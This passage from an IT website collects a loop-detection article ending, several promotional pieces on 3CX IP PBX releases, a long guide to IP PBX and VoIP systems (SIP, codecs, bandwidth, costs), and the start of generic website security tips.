The method used to analyze physical loops is almost identical, but the TTL values of all looped packets remain the same, instead of decreasing as we previously saw. Because the packet is trapped in our local network, it doesn’t traverse a router, therefore the TTL does not change.

Below we see a DNS Query packet that is trapped in a network loop:

how-to-detect-routing-and-physical-loops-using-a-network-analyzer-05
Figure 5. Discovering Network loops and why their TTL values do not decrease

Advanced network analyzers allows us to quickly detect serious network problems that can cause network outages, packet loss, packet flooding and more.

  • Hits: 70713

3CX Unified Communications New Web Client IP Phone, Web Meetings, Click-to-Call & More with V15.5

3cx video conferenceThe developers of the popular software PBX, 3CX, have announced another major update to their unified communications solution! The latest release, 3CX v15.5, makes the phone system faster, more secure and more reliable with a number of improvements and brand new features. 

 Notably, v15.5 brings with it a totally new concept for the PBX system, a completely web-based softphone client that can be launched straight from any open-standards browser. The web client has an attractive, modern interface which makes it incredibly user-friendly, allowing tasks such as call transferring, deskphone control and more to be carried out in a single click.

3CX’s Web-Client provides leading features packed in an easy-to-use GUIWeb-Client provides leading features packed in an easy-to-use GUI

Unified Communications IP PBX That Can Be Deployed Anywhere

Furthering their commitment to providing an easy to install and manage PBX, 3CX has also made deployment easier and more flexible. 3CX can be deployed on MiniPC appliances of leading brands such as Intel, Zotac, Shuttle and Gigabyte meaning that businesses on a budget can ensure enterprise level communications at a fraction of the price.

Additionally, 3CX has ensured more freedom of choice when it comes to deploying the PBX in the cloud. With more supported hosters, such as 1&1, and an easy to use 8 step wizard that allows customers and resellers to have a fully configured PBX up and running in minutes. 

IP PBX With Integrated Web Conferencing

The brand new web client includes integrated web conferencing completely free of charge without any additional licensing or administration. Video conferences are held directly from the browser with no additional downloads or plugins, and most importantly, this applies to remote participants as well!

3CX: IP PBX Web Client with integrated Web Conferencing Free of Charge! IP PBX Web Client with integrated Web Conferencing Free of Charge!

More Reliable, Easier to Control Your Deskphone or Smartphone

By implementing the uaCSTA standard for deskphones, 3CX has significantly improved remote control of phones. This has ensured more reliable control of IP phones regardless of the location of the extension or whether or not the PBX is being run on-premise or in the cloud. Moreover, the 3CX smartphone clients for Android and iOS can now also be remote controlled.

3CX’s Click-to-Call Feature from any Web page or CRMClick-to-Call Feature from any Web page or CRM

Additional Improvements & Features Include:

  • Click2Call Chrome Extension to dial from any web page or CRM
  • Integrated Hotel Module
  • Support for Google Firebase PUSH
  • Achieve PCI compliance in financial environments
  • Hits: 13355

3CX’s Unified Communications IP PBX enhanced to includeNew Web Client, Rich CTI/IP Phone Control, Free Hotel Module & Fax over G.711 - Try it Today for Free!

3CX has done it again! Working on its multi-platform, core v15 architecture, the UC solution developers have released the latest version of its PBX in Alpha, v15.5. The new build includes some incredibly useful features including a web client - a completely new concept for this product.

3CX has made a big efforts to ensure its IP PBX product remains one of the Best Free UC IP PBX systems available!

The new 3CX Intuitive web client that leaves competitors miles behind

The new 3CX Intuitive web client that leaves competitors miles behind

User-Friendly & Feature-Rich

The 3CX Web Client, built on the latest web technology (angular 4), currently works in conjunction with the softphone client for calls, and allows users to communicate and collaborate straight from the browser. The modern, intuitive interface combines key 3CX features including video conferencing, chat, switchboard and more, improving overall usability.

Improved CTI/IP Phone Control

3CX IP PBX cti ip phone call

Desktop call control has been massively improved. Even if your phone system is running in the cloud, supported phones can be reliably controlled from the desktop client. This improvement follows the switch to uaCTSA technology. Moreover, a new Click 2 Call Chrome extension makes communication seamless across the client and browser.

Reintroduction Of The Hotel Module Into 3CX

The Hotel Module has been restored into 3CX and is now included free of charge for all PRO/Enterprise licenses - great news for those in the hospitality industry.

Additionally, 3CX now supports Google’s FIREBASE push, and fax over G711 has been added amongst various other improvements and features.

  • Hits: 8889

How to Get a Free Fully Functional Cloud-Based Unified Communications PBX with Free Trial Hosting on Google Cloud, Amazon or OVH!

3cx ip pbx client consoleCrazy as it might sound there is one Unified Communications provider who is giving out free fully functional cloud-based PBX systems without obligation from its users/customers.

3CX, a leader in Unified Communications, has just announced the availability of its new PBX Express online wizard designed to easily deploy a PBX in your own cloud account

3CX’s Advanced Unified Communications features were recently covered in our article The Ultimate Guide to IP PBX and VoIP Systems - The Best Free IP PBXs For Businesses. In the article we examined the common components of a modern Unified Communications platform and how they are all configured to work together enabling free real-time communications and presence for its users no matter where they are in the world.

Now Free Cloud-based services are added to the list and the features are second to none plus they provide completely Free Trial Hosting, Domain Name, associated SSL certificates and much more!

3CX’s intuitive dashboard allows quick & easy administration with zero prior experience!

3CX’s intuitive dashboard allows quick & easy administration with zero prior experience!

Here’s what the Free Unified Communications PBX includes:

  • Free fully-functional Unified Communications PBX
  • Up to 8 simultaneous calls
  • Ability to make/receive calls on your SIP phones or mobile devices via IP
  • Full Support for iPhone and Android devices
  • Full support for iPads and Tablet devices
  • Presence Services (See who’s online, availability, status etc.)
  • Instant Messaging
  • Video conferencing
  • Desktop Sharing
  • Zero Maintenance – Everything is taken care of for you!
  • Free Domain Name selection (over 20 countries to select from!)
  • Free Trial Hosting on Google Cloud – Amazon Web Services or OVH!
  • SSL Certificate
  • Fast deployment- no previous experience required
  • Super-easy administration
  • …and much more!

3CX’s Unified Communications PBX system is an advanced, flexible PBX that can be run locally in your office at no cost which is why thousands of companies are switching to 3CX. With the choice of an on-premises solution that supports Windows and Linux operating systems and now the free cloud-based hosting – it has become a one-way solution for companies seeking to move to an advanced Unified Communications system but at the same time seeking to dramatically cut telecommunication costs.

3cx ip pbx smartphone iphone clientThanks to its support for any SIP-based IP phone and mobile device (iPhone, Android, iPad, Tablet etc.) the 3CX IP PBX has quickly become the No.1 preferred solution.

3CX’s commitment to its customers and product is outstanding with regular updates covering its main UC PBX product but also mobile device clients - ensuring customers are not left with long outstanding problems or bugs. 3CX recently announced a number of bug fixes and enhancements for the 3CX Client for Android but also the 3CX Client for Mac confirming once again that it’s determined not to leave customers in the dark and continually improve its services and product’s quality.

Read The Ultimate Guide to IP PBX and VoIP Systems - The Best Free IP PBXs For Businesses article for more information on the 3CX UC solution.

  • Hits: 9250

3CX Unified Communication Leading Free IP PBX Brings Linux Edition On-Par with Windows Edition

3CX Free IP PBX Unified Communications Solution3CX, developer of the software-based unified communications solution, has announced the release of 3CX V15 Service Pack 5 which brings the final Linux version of the PBX. The update achieves complete feature parity with the popular Windows version of the software. The company also reports that SP5 has added further automation of admin management tasks and made hosting of the system in the cloud easier with leading cloud providers.

3CX Unified Communication Suite and Capabilities

Read our Ultimate Guide to IP PBX - Unified Communications - The Best Free IP PBXs for Today's Businesses

Improvements to Auto Updates / Backups

  • Automatic uploading of backups to a Google Drive Account.
  • Automatic restoration of backups to another instance with failover.
  • Easier configuration of failover.
  • Automatic installation of OS security updates for Debian.
  • Automatic installation of 3CX tested product updates.
  • Automatic downloads of tested phone firmwares and alerts for outdated firmware.
  • A Labs feature to test upcoming updates released for BETA.
  • Digital receptionists can be configured as a wake-up call service extension.
  • GMail or Office 365 accounts can be more easily configured for notification emails from the PBX.
  • Improved DID source identification.
  • Windows and Mac clients are now bundled with the main install.
  • Automatic push of chat messages to the iOS and Android smartphone clients.
  • Hits: 8785

The Ultimate Guide to IP PBX and VoIP Systems. The Best Free IP PBXs For Businesses

3CX Unified CommunicationsVoIP/ IP PBXs and Unified Communication systems have become extremely popular the past decade and are the No.1 preference when upgrading an existing or installing a new phone system. IP PBXs are based on the IP protocol allowing them to use the existing network infrastructure and deliver enhanced communication services that help organizations collaborate and communicate from anywhere in the world with minimum or no costs.

This article explains the fundamentals of IP PBX systems, how IP PBXs work, what are their critical VoIP components, explains how they can connect to the outside world and shows how companies can use their IP PBX – Unified Communications system to save costs. We also take a look at the best Free VoIP PBX systems and explain why they are suitable for any size small-to-medium organization.

VOIP PBX – The Evolution of Telephone Systems

Traditional, Private Branch Exchange (PBX) telephone systems have changed a lot since the spread of the internet. Slowly but surely, businesses are phasing out analogue systems and replacing them with IP PBX alternatives.

A traditional PBX system features an exchange box on the organization’s premises where analogue and digital phones connect alongside external PSTN/ISDN lines from the telecommunication company (telco). It gives the company full ownership, but is expensive to setup and most frequently requires a specialist technician to maintain, repair and make changes.

Analogue-Digital PBX with phones and two ISDN PRI lines 

A typical Analogue-Digital PBX with phones and two ISDN PRI lines

Upgrading to support additional internal extensions would usually translate to additional hardware cards being installed in the PBX system plus more telephone cabling to accommodate the new phones. When a company reached its PBX maximum capacity (either phones or PSTN/ISDN lines) it would need to move to a larger PBX, resulting in additional costs.

IP PBXs, also known as VoIP systems or Unified Communication solutions, began penetrating the global PBX market around 2005 as they offered everything a high-end PBX offered, integrated much better with desktop applications and software (e.g outlook, CRMS etc) and supported a number of important features PBXs were not able to deliver. IP PBX and Unified Communication systems such as 3CX are able to deliver features such as:

  • Integration with existing network infrastructure
  • Minimizing the cost of upgrades
  • Using existing equipment such as analogue phones, faxes etc.
  • Desktop/mobile softphones that replaced the need for physical phone devices
  • Delivering full phone services to remote offices without requiring separate PBX
  • Allowing mobile users to access their internal extension via VPN or other secure means
  • User-friendly Web-based management interface
  • Support for virtualized-environments that increased redundancy level and dramatically decreased backup/redundancy costs
  • Supported third party software and hardware devices via non-proprietary communication protocols such as Session Initiation Protocol (SIP)
  • Using alternative Telecommunication providers via the internet for cheaper call rates

The features offered by IP PBXs made them an increasingly popular alternative for organizations that were seeking to reduce telecommunication cost while increasing productivity and moving away from the vendor-proprietary solutions.

Why Businesses are Moving to IP PBX solutions

According to surveys made back in 2013, 96% of Australian businesses were already using IP PBXs. Today it’s clear that the solution has huge advantages. IP PBX offers businesses increased flexibility, reduced running costs, and great features, without a premium. There are so many advantages that it’s difficult for organizations to justify traditional analogue/digital PBXs. Even market leaders in the PBX market such as Siemens, Panasonic, Alcatel and others had to adapt to the rapidly changing telecommunications market and produce hybrid models that supported IP PBX features and IP phones, but these were still limited when compared with a full IP PBX solution.

When an IP PBX is installed on-site it uses the existing LAN network, resulting in low latency and less room for interference. It’s also much easier to install than other PBX systems. Network engineers and Administrators can easily configure and manage an IP PBX system as most distributions come with a simple user interface. This means system and phone settings, call routing, call reporting, bandwidth usage and other settings can be seen and configured in a simple browser window. In some cases, employees can even configure their own preferences to suit their workflow.

Once installed, an IP PBX can run on the existing network, as opposed to a whole telephone infrastructure across business premises. That means less cable management and the ability to use existing Ethernet cables, resulting in smaller starting costs. This reduction in starter costs can be even more significant if the company has multiple branches in different places. Internet Leased Lines with unlimited usage plans mean voice calls can be transmitted over WAN IP at no extra cost.

In addition, firms can use Session Initiation Protocol (SIP) trunking to reduce phone bills for most calls. Communications are routed to the Telco using a SIP trunk via the IP PBX directly or a Voice Gateway. SIP is an IP-based protocol which means the Telco can either provide a dedicated leased line directly into the organization’s premises or the customer can connect to a Telco’s SIP server via the internet. Usually main Telco lines are provided via a dedicated IP-based circuit to ensure line stability and low latency.

With SIP trunks Telco providers usually offer heavily reduced prices over traditional methods such as PSTN or ISDN circuits. This is especially true for long-distance calls, where communication can be made for a fraction of a price when compared to older digital circuits.

Savings on calls via SIP trunk providers can be so significant that many companies with old Legacy PBXs have installed an IP PBX that acts as a Voice Gateway, which routes calls to a SIP provider as shown in the diagram below:

Connecting an Analogue-Digital PBX with a SIP Provider via a Voice Gateway 

Connecting an Analogue-Digital PBX with a SIP Provider via a Voice Gateway

In this example an IP PBX with Voice Gateway (VG) capabilities is installed at the organization. The Voice Gateway connects on one end with the Analogue - Digital PBX using an ISDN BRI interface providing up to 2 concurrent calls while at the other end it connects with a SIP provider via IP.

The SIP provider can be reached via the internet, usually using a dedicated internet connection, or even a leased line if the SIP provider has such capabilities. The Analogue - Digital PBX is then programmed to route all local and national calls via the current telco while all international calls are routed to the SIP provider via the Voice Gateway.

The organization is now able to take advantage of the low call costs offered by the SIP provider.

The digital nature of IP PBX makes it more mobile. Softphone applications support IP PBX and let users make calls over the internet from their smartphone or computer. This allows for huge portability while retaining the same extension number. Furthermore, this often comes at a flat rate, avoiding per-minute fees. Advanced Softphones support a number of great features such as call recording, caller ID choice, transfer, hold, voice mail integration, corporate directory, just to name a few.

A great example is 3CX’s Free Windows softphone, which is a great compact application under continuous development that delivers everything a mobile desktop user would need to communicate with the office and customers while on the road or working from home:

3CX windows softphone client & Presence

3CX Windows Softphone and Presence application

IP PBX, being a pure-IP based solution, means that users are able to relocate between offices or desks without requiring changes to the cabled infrastructure. IP phones can be disconnected from their current location and reconnected at their new one. With the help of a DHCP server the IP phone will automatically reconfigure and connect to the IP PBX with the user’s internal extension and settings.

A technology called Fixed Mobile Convergence or Follow-me can even allow employees to make a landline call on their mobile using WiFi, then move to cellular once they get out of range. The cellular calls can be routed through the IP PBX when on-site through their IP phone or local network. When users are off-site the mobility client automatically registers with the organization’s IP PBX via the internet extending the user’s internal extension to the mobile client. Calls are automatically routed to the mobile client without the caller or co-workers being aware.

Another big advantage is the unification of communications. Rather than a separate hardware phone, email, voicemail and more, companies can roll them into one system. In many cases, softphones can be integrated into the existing software such as Outlook, CRM, ERP and more. What’s more, employees can receive voicemails and faxes straight to their email inbox.

That’s not to say VoIP is without flaws. For a start, it relies heavily on the network, so issues can bring the call system down if a backup isn’t implemented or there are big network problems. It’s also less applicable for emergency services because support for such calls is limited. A lot of VoIP providers offer inadequate functionality and the communications are often untraceable. Though an IP PBX is the best solution for most businesses, it depends on the individual circumstances.

Main Components of a Modern Unified Communication IP PBX

A Unified Communication IP PBX system is made from a series of important components. Firstly, you have the computer needed to run the IP PBX software. This is the Call Control server that manages all endpoint devices, Call routing, voice gateways and more.

The IP PBX software is loaded on the server and configured by the Network Administrator. Depending on the vendor the IP PBX can be integrated into a physical device such as a router e.g Cisco CallManager Express or it might be a software application that can be installed on top of the server’s operating system e.g 3CX IP PBX.

In 3CX’s case, the IP PBX software can run under the Windows platform (workstation or server) or even the Linux platform. 3CX also supports Hyper-V and VMWare virtualization platforms helping dramatically increase availability and redundancy at no additional cost.

IP PBX & VoIP Network Components

IP PBX & VoIP Network Components

VoIP Gateways, aka Voice Gateways or Analogue Telephony Adaptor (ATA), play a dual role – they act as an interface between older analogue devices such as phones, faxes etc and the newer VoIP network allowing them to connect to the VoIP network. The VoIP Gateway in this case is configured with the extensions assigned to these devices and registers to the IP PBX on their behalf using the SIP protocol. When an extension assigned to an analogue device is called, the IP PBX will send the signal to the VoIP Gateway which will produce the necessary ringing signal to the analogue device and make it ring. As soon as the phone is picked up, the VoIP Gateway will connect the call acting as a “router” between the analogue device and VoIP network. ATA is usually the term used to describe a VoIP Gateway that connects a couple of analogue devices to the VoIP network.

VoIP Gateways are also used to connect an IP PBX to the Telco, normally via an ISDN (BRI or PRI) or PSTN interface. Incoming and outgoing calls will traverse the VoIP Gateway connecting the IP PBX with the rest of the world.

IP phones are the physical devices used to make and accept phone calls. Depending on the vendor and model, these can be simple phones without a display or high end devices with colour multi-touch displays and enhanced functions such as multiple line support, speed dials, video conferencing and more. Popular vendors in this field include Cisco, GrandStream, Yealink and others. All IP phones communicate using the non-propriatery SIP protocol. This makes it easy for organizations to mix and match different hardware vendors without worrying about compatibility issues.

In the case of a softphone the application runs on a desktop computer or smartphone and is capable of providing all services similar to those of an IP phone plus a lot more. Users can also connect a headset, microphone, or speakers if needed.

3CX Android and iPhone softphone SIP client

3CX’s free SIP-based softphone for Android (left) and iPhone (right) both provide a wealth of functions no matter where users are located

However, the key part of a Unified Communication IP PBX is its ability to use this existing hardware and software to bring multiple mediums together intuitively. Outlook allows you to make softphone calls straight from the email interface, removing the need for a long lists of details.

This is combined with the integration of instant messaging so that call takers can correspond with other staff if they’re giving tech support. It can be further enhanced by desktop sharing features to see exactly what a user is doing, as well as SMS, fax, and voicemail.

More advanced Unified Communications platforms use speech recognition for automatic, searchable transcriptions of calls. Large organizations are even implementing artificial intelligence in their workflow. Microsoft’s virtual support assistant looks at what employees are doing and provides relevant advice, information, and browser pages. The ultimate goal is for an employee to obtain everything they need with minimal effort.

How an IP PBX Works

It’s important to understand how each of these components work to form a cohesive whole. Each IP phone is registered with the IP PBX server, which is usually just a specially configured PC running the Windows or Linux operating system. This OS can also be run on a virtual machine.

Advanced IP PBX systems such as 3CX support both Windows and Linux operating systems but can also be hosted on virtualized platforms such as Hyper-V and VMware, offering great value for money.

The IP PBX server creates a list that contains the Session Initiation Protocol addresses (SIP) of each phone. For the unfamiliar, SIP is the most popular protocol for transmitting telephone data over networks. It sits on top of the application layer of the OSI model, and integrates elements from HTTP and SMTP. As such, the identifying SIP addresses look like a mash-up of an email address and a telephone number.

SIP Accounts

SIP endpoint accounts (IP Phones, softphones, VoIP Gateways) are configured on the IP PBX with their extension and credentials. Similarly the endpoint devices are configured with the IP PBX’s IP address and their previously configured accounts. Once the SIP endpoint device registers to the IP PBX it is ready to start placing and receiving phone calls.

SIP Endpoint Registering to an IP PBX System 

SIP Endpoint Registering to an IP PBX System

Once a user places a call, the system can determine if the call is going to a phone on the same system or externally. Internal calls are detected via the SIP address and routed straight to each other over LAN. External calls are routed to the Telco Provider via the Voice Gateway or a SIP trunk depending on the setup.

Naturally, these calls are made from the hardware and softphones mentioned earlier. Hardware IP phones connect to the network using a standard RJ-45 connector, replacing the older RJ-11 connectors used by the analogue telephones.

Voice Codecs – G.711, G.729, G.722

Audio signals from the IP phones must be converted into a digital format before it can be transmitted. This is done via a codec, which compresses it and then decodes as it's replayed. There are several different types of codecs, and what you use decides both the audio quality and the amount of bandwidth used.

SIP endpoints located on the LAN network almost always use G.711 codec which has a 1:2 compression and a 64Kbps bitrate plus 23.2Kbps for the IP overhead resulting in a bitrate of 87.2Kbps. It delivers high, analogue telephone quality but comes with a significant bandwidth cost which is not a problem for the local network speeds which average 1Gbps.

When a SIP endpoint is on the road away from the office, moving to a less bandwidth-intensive codec at the expense of voice quality is usually desirable. The most commonly used codec for these cases is G.729, which provides an acceptable audio quality for just 31.2Kbps bitrate that breaks down to 8Kbps plus 23.2Kbps for the IP overhead. It’s similar to the call quality of your average cell phone.

G.711 vs G.729 Call - Bandwidth Requirements per call

G.711 vs G.729 Call - Bandwidth Requirements per call

G.722 delivers a better call quality than even PSTN, but is best for high bandwidth scenarios or when great audio quality is essential.

SIP Trunks

Finally, SIP Trunks are also configured with codecs for incoming and outgoing phone calls. This is also why, when connecting to an internet-based SIP provider, special consideration must be taken to ensure there is enough bandwidth to support the number of simultaneous calls desired. For example, if we wanted to connect to a SIP provider and support up to 24 simultaneous calls using G.711 codec for high-quality audio, we would require 87.2Kbps x 24 = 2092.8Kbps of bandwidth or 2.043Mbps during full line capacity.

Voicemail with IP PBXs

Voicemail works differently to that in a traditional phone environment. A voicemail server was typically a standalone unit or an add-in card. In IP PBX systems, voicemail is integrated into the solution and stored in a digital format. This has several advantages, including the ability to access voicemail via a web browser or mobile phone, forward voicemails to an email account, forward a voicemail to multiple recipients via email and many more.

In addition, some IP PBXs can be configured to automatically call the person for which voicemail was left and play any messages in their voicemail.

How an IP PBX Can Help Save Money

Once you understand the fundamental differences between an IP PBX and legacy analogue/digital PBXs, it becomes clearer how an organization can save.

Because IP PBX runs on existing network infrastructure, there’s no need for separate cabling. This negates a significant chunk of the setup costs, as does the simplicity of installation. The initial investment can be up to ten times less than traditional PSTN systems. It means a huge reduction in service costs. The lack of physical separate wires means no chance for damage that can be costly to repair and maintain. Moving between offices is now an easy task as no cable patching is required from the IP PBX to the IP Phone. All that’s required is a data port to connect the IP phone or an access point in case of a wireless client (laptop, mobile device) with a softphone.

Maintenance of the underlying systems is also far easier. Most IP PBX systems run on either Linux or Windows, systems that technicians are usually intimately familiar with. This means technical problems often don’t need to be outsourced. When a patch or upgrade is available from the vendor the administrator can quickly create a snapshot of the IP PBX system via the virtualization environment and proceed with the installation. In the unlikely event the system doesn’t behave as expected he can roll back to the system’s previous state with the click of a button.

Upgrading the IP PBX to further extend its functionality is far more cost and time efficient compared to older PBXs. In most cases, new features are just a matter of purchasing an add-on or plugin and installing it. This scalability extends to the reach of the system itself. Traditional phone systems only have a certain number of ports that phones can be connected to. Once you reach that limit it will cost a significant amount to replace the existing system. With IP PBX, this isn’t an issue. IP phones connect via the network and aren’t limited by the same kind of physical factors.

As already noted, some IP PBX providers support running on a virtual platform. 3CX is one of the most popular and stable solutions that officially support both Hyper-V and VMWare. This functionality means you can create low-cost backups of the system.

The savings are even more prominent when you consider the price of VoIP compared to traditional PBX. SIP trunking can result in huge monthly savings of around 40%, depending on usage. If the business regularly makes calls abroad, there’s room for even more savings as it won’t be subject to hefty international fees.

3cx easy-to-use IP PBX management consoleThe 3CX Management Console is packed with funtionality, settings, call analysis plus monitoring. (clkick to enlarge)

Furthermore, extending the number of maximum simultaneous calls on a SIP trunk is an easy process usually only requiring changes to the SIP account and additional bandwidth available toward the SIP provider. These changes can generally be made in a few days. With traditional ISDN or PSTN lines the organization would need to order the additional lines from the Telco and wait up to a few weeks to have the new lines physically installed. Then there is the additional monthly service fee charged by the Telco regardless of the new lines usage. Most of these costs do not exist with SIP providers and SIP trunks, making them a much cheaper and faster solution. Most US, UK and Australian based Telco providers are now moving from the ISDN protocol to SIP trunking making it only a matter of time until ISDN is no longer offered as a standard.

Companies can make the choice to use codecs such as G.729 instead of G.711 with their SIP provider. This means that they can choose to sacrifice voice quality and reduce their SIP trunking bandwidth requirements by 70%. For example, a SIP trunk using G.711 codec and supporting up to 24 simultaneous calls requires 87.2Kbps x 24 = 2092.8Kbps of bandwidth or 2.043Mbps during full line capacity.

ISDN T1 Bandwidth requirements - G.711 vs G.729

ISDN T1 Bandwidth requirements - G.711 vs G.729

With G.729 the same SIP trunk would require 31.2Kbps x 24 = 748.8Kbps of bandwidth or 0.73Mbps during full line capacity!

In addition to these direct savings, the advanced features offered by IP PBXs and the flexibility they have can result in a huge increase in productivity. The ability to commutate efficiently with colleagues and customers often results in higher satisfaction, increased work output and more profit.

All of this adds up to some huge cost savings, with estimates of up to 80% over an extended period. Not only are IP PBX systems cheaper to set up, they’re cheaper to maintain, upgrade, scale and remove.

Free IP PBXs vs Paid

It’s often tempting to cut costs further by opting for a free IP PBX solution. However, these often lack the support and features of a paid alternative. Most providers put a limit on outgoing calls, how the absence of important VoIP and Unified Communication features are usually the main problem which servely limit the system's functionality. Solutions such as 3CX offer full product funtionality with up to 8 simultaneous calls and no cost making it the ideal VoIP system for startup and small companies.

The security of some free providers has been brought into question. Asterisk has been hacked on several occasions, though security has been hardened significantly now. Though no system is completely secure, paid providers often have dedicated security teams and ensure systems are hard to penetrate by default, rather than requiring extra configuration or expertise that the end customer might not have.

Low-cost editions come with a multitude of other features. Integration of applications is a big one, 3CX’s pro plan offers Outlook, Salesforce, Microsoft Dynamics, Sugar CRM, Google Contact and more.

It’s a must for unified communications features such as video calls, conferencing and integrated fax servers. The number of participants that can join a conference call is also higher with subscription-based versions of 3CX.

These advanced features extend to calls, with inbuilt support for call recording, queuing and parking. 3CX even offers a management suite for call recordings, saving the need to set up additional software. In paid versions, functionality like this is more likely to extend to Android, iOS, and other platforms.

However, perhaps the most important advantage is the amount of support offered by subscription-based services. Higher profits mean they can offer prompt, dedicated support, against the often slow and limited services of free providers. Though a paid service isn’t always essential, the extra productivity and support they bring is usually well worth the price – especially when considering the negative impact a technical IP telephony issue can have on the organization.

Popular Free/Low-Cost IP PBX Solutions

That said, small businesses can probably get away with a free IP PBX solution. There are reputable, open-source solutions out there completely free of charge. The biggest, most popular one is Asterisk. The toolkit has been going for years, and has a growing list of features that begins to close the gap between free and subscription-based versions.

Asterisk supports call distribution, and interactive voice menu, voicemail, automatic call distribution, and conference calling. It’s still a way off premium services due to many of the reasons above, but it’s about as good as it gets without shelling out.

Despite that, there are still some notable competitors. Many of them started as branches of Asterisk, which tends to happen in the open source community. Elastix is one of these and provides a unified communications server software with email, IM, IP PBX, collaborating and faxing. The interface is a bit simpler than its grandfather, and it pulls in other open source developments such as Openfire, HylaFax and Postfix to offer a more well-rounded feature line-up.

SIP Foundry, on the other hand, isn’t based on Asterisk, and is considered as much as a competitor as there can be. Its feature list is much the same as Asterisk, but is marketed more towards businesses looking to build their own bespoke system. That’s where SIP Foundry’s business model comes in, selling support to companies for a substantial $495 US per month for 100 users.

Other open source software has a focus on security. Kamailio has been around for over fifteen years, and supports asynchronous TCP, UDP and TLS to secure VoIP video text, and WebRTC. This combines with authentication and authorization as well as load balancing and routing fail-over to deliver a very secure experience. The caveat is that Kamailio can be more difficult to configure, and admins need considerable knowledge of SIP.

Then there’s 3CX. The company provides a well-featured free experience that has more than enough to get someone started with IP PBX. All the essential features are there, from call logging, to voicemail, to one-click conferencing. However, 3CX also offers more for those who want it, including some very powerful tools. The paid versions of 3CX are still affordable, but offer the same features of some of the most expensive solutions on the market. It offers almost unprecedented application integration and smart call centre abilities at a reasonable price.

3CX also supports a huge range of IP phones, VoIP Gateways, and any SIP Trunk provider. The company works with a huge list of providers across the world to create pre-configured SIP Trunk templates for a plug and play setup. These templates are updated and tested with every single release, ensuring the user has a problem-free experience. What’s more, powerful, intuitive softphone technology is built straight into the switchboard, including drag and drop calls, incoming call management, and more.

Unified Communications features include mobility clients with advanced messaging and presence features that allow you to see if another user is available, on-call or busy. Click-to-call features can be embedded on the organization’s website allowing visitors to call the company with a click of a button through their web browser. Advanced Unified Communications features such as 3CX WebMeeting enables video calling directly from your organization’s website. Website visitors initiate a video call to your sales team with a click of a button.

 3cx web conferencing

3CX WebMeeting enables clientless video conferencing/presentation from any web browser

Employees can also use 3CX WebMeeting to communicate with colleagues in different physical locations and perform presentations, share videos, PowerPoint presentations, Word document, Excel spreadsheet, desktop or any other application. Many of these features are not even offered in larger high-end enterprise solutions or would cost thousands of dollars to purchase and maintain.

3CX has also introduced VoIP services and functionality suitable for hotels making their system an ideal Hotel-Based VoIP system.

Downloading the free 3CX IP PBX system is well-worth the time and effort for organizations that are seeking to replace or upgrade their PBX system at minimal or no-cost.

Summary

IP PBXs offer so many advantages over traditional PBX that implementation is close to a no-brainer. IP PBX is cheaper in almost every way, while still giving advanced features that just aren’t possible with other systems. The ability to intelligently manage incoming and outgoing calls, create conference calls on the fly, advanced mobility features that make it possible to work from home are almost essential in this day and age. Add to that the greatly reduced time and resources needed to upgrade, and you have a versatile, expandable system which won’t fall behind the competition.

Though some of these benefits can be had with completely free IP PBX solutions, paid services often come with tools that can speed up workflow and management considerably. The returns gained from integration of Microsoft Dynamics, Office 365, Salesforce and Sugar CRM are often well worth the extra cost.

However, such functionality doesn’t have to be expensive. Low-cost solutions like 3CX offer incredible value for money and plans that can be consistently upgraded to meet growing needs. The company lets you scale from a completely free version to a paid one, making it one of the best matches out there for any business size.

  • Hits: 28216

7 Security Tips to Protect Your Websites & Web Server From Hackers

digital eyeRecent and continuous website security breaches on large organizations, federal government agencies, banks and thousands of companies world-wide, has once again verified the importance of website and web application security to prevent hackers from gaining access to sensitive data while keeping corporate websites as safe as possible. Though many encounter a lot of problems when it comes to web application security; it is a pretty heavy filed to dig into.

Some security professionals would not be able to provide all the necessary steps and precautions to deter malicious users from abusing your web application. Many web developers will encounter some form of difficulty while attempting to secure their website, which is understandable since web application security is a multi-faceted concept, where an attacker could make use of thousands of different exploits that could be present on your website.

Although no single list of web security tips and tricks can be considered as complete (in fact, one of the tips is that the amount of knowledge, information and precautions that you can implement is never enough), the following is as close as you can get. We have listed six concepts or practices to aid you in securing your website which, as we already mentioned, is anything but straightforward. These points will get you started and nudge you in the right direction, where some factors in web application security are considered to be higher priority to be secured than others.

1. Hosting Options

web hostingWithout web hosting services most websites would not exist. The most popular methods to host web applications are:regular hosting, where your web application is hosted on a dedicated server that is intended for your website only, and shared hosting, where you share a web server with other users who will in turn run their own web application on the same server.

There are multiple benefits to using shared hosting. Mainly this option is cheaper than having your own dedicated server which, therefore, generally attracts smaller companies preferring to share hosting space. The difference between shared and dedicated hosting will seem irrelevant when looking at this from a functionality point of view, since the website will still run, however, when discussing security we will need to look at it from a completely different perspective.

The downside of shared hosting trumps any advantages that it may offer. Since the web server is being shared between multiple web applications, any attacks will also be shared between them. For example, if you share your web server with an organisation that has been targeted by attackers who have launched Denial of Service attacks on its website, your web application will also be affected since it is being hosted on the same server while using resources from the same resource pool. Meanwhile, the absence of complete control over the web server itself will allow the provider to take certain decisions that may place your web application at risk of being exploited. If one of the websites being hosted on the shared server is vulnerable, there is a chance that all the other websites and the web server itself could be exploited. Read more about web server security.

2. Performing Code Reviews

code review checkMost successful attacks against web applications are due to insecure code and not the underlying platform itself. Case in point, SQL Injection attacks are still the most common type of attack even though the vulnerability itself has been around for over 20 years. This vulnerability does not occur due to incorrect input handling by the database system itself, it is entirely related to the fact that input sanitization is not implemented by the developer, which leads to untrusted input being processed without any filtering.

This approach only applies for injection attacks and, normally, inspecting code would not be this straightforward. If you are making use of a pre-built application, updating to the latest version would ensure that your web application does not contain insecure code, although if you are using custom built apps, an in depth code review by your development team will be required. Whichever application type you are using, securing your code is a critical step or else the very base of the web application will be flawed and therefore vulnerable.

3. Keeping Software Up To Date

software updateWhen using software that has been developed by a third party, the best way to ensure that the code is secure would be to apply the latest updates. A simple web application will make use of numerous components that can lead to successful attacks if left unpatched. For example, both PHP and MySQL were vulnerable to exploits at a point in time but were later patched, and a default Linux webserver installation will include multiple services all of which need to be updated regularly to avoid vulnerable builds of software being exploited.

The importance of updating can be seen from the HEARTBLEED exploit discovered in OpenSSL, which is used by most web applications that serve their content via HTTPS. That being said, patching these vulnerabilities is an easy task once the appropriate patch has been released, you will simply need to update your software. This process will be different for every operating system or service although, just as an example to see how easy it is, updating services in Debian based servers will only require you to run a couple of commands.

4. Defending From Unauthorised Intrusions

defending against intrusionsWhile updating software will ensure that no known vulnerabilities are present on your system, there may still be entry points where an attacker can access your system that have been missed in our previous tips. This is where firewalls come into play. A firewall is necessary as it will limit traffic depending on your configuration and can also be found on most operating systems by default.

